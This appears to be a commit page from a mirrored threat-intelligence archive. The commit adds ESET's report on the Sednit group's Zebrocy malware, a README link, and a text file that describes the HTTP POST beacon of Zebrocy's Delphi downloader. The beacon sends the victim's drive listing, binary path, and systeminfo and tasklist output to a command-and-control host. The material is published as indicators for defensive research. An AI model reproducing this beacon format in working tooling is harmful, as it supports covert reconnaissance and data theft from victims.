Mirrors/APT_CyberCriminal_Campagin_Collections
6
0
Fork 0
mirror of https://github.com/CyberMonitor/APT_CyberCriminal_Campagin_Collections synced 2024-06-24 07:49:57 +00:00
Code Issues Projects Releases Wiki Activity

2018.04.24.sednit-update-analysis-zebrocy

Browse Source
This commit is contained in:
CyberMonitor 2018-04-25 15:38:13 +08:00
parent 00614bb5b1
commit d94c6fcbae
3 changed files with 21 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

19
2018/2018.04.24.sednit-update-analysis-zebrocy/Delphi_downloader_HTTP_POST_request.txt Normal file
View File

@ -0,0 +1,19 @@
POST (\/[a-zA-Z0-9\-\_\^\.]*){3}\.(php|dat)?fort=<SerialNumber_C> HTTP/1.0
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: xxxx
Host: <ip_address>
Accept: text/html, */*
Accept-Encoding: identity
User-Agent: Mozilla v5.1 (Windows NT 6.1; rv:6.0.1) Gecko/20100101 Firefox/6.0.1
pol=MM/DD/YYYY%20HH:MM:SS%20(AM|PM)%0D%0A<DriveListing>%0D%0A%0D%0A<Path_to_the_binary>%0D%0A%0D%0A<SYSTEMINFO & TASKLIST output>
[...]

BIN
2018/2018.04.24.sednit-update-analysis-zebrocy/sednit-update-analysis-zebrocy_.pdf Normal file
View File

Binary file not shown.

3
README.md
View File

@ -16,7 +16,8 @@ Please fire issue to me if any lost APT/Malware events/campaigns.
## 2018
* Apr 23 - [[Kaspersky] Energetic Bear/Crouching Yeti: attacks on servers](https://securelist.com/energetic-bear-crouching-yeti/85345/) | [Local](../../blob/master/2018/2018.04.12.operation-parliament)
* Apr 24 - [[ESET] Sednit update: Analysis of Zebrocy](https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/) | [Local](../../blob/master/2018/2018.04.24.sednit-update-analysis-zebrocy)
* Apr 23 - [[Kaspersky] Energetic Bear/Crouching Yeti: attacks on servers](https://securelist.com/energetic-bear-crouching-yeti/85345/) | [Local](../../blob/master/2018/2018.04.23.energetic-bear-crouching-yeti)
* Apr 12 - [[Kaspersky] Operation Parliament, who is doing what?](https://securelist.com/operation-parliament-who-is-doing-what/85237/) | [Local](../../blob/master/2018/2018.04.12.operation-parliament)
* Apr 04 - [[Trend Micro] New MacOS Backdoor Linked to OceanLotus Found](https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-backdoor-linked-to-oceanlotus-found/) | [Local](../../blob/master/2018/2018.04.04.MacOS_Backdoor_OceanLotus)
* Mar 29 - [[Trend Micro] ChessMaster Adds Updated Tools to Its Arsenal](https://blog.trendmicro.com/trendlabs-security-intelligence/chessmaster-adds-updated-tools-to-its-arsenal/) | [Local](../../blob/master/2018/2018.03.29.ChessMaster_Adds_Updated_Tools)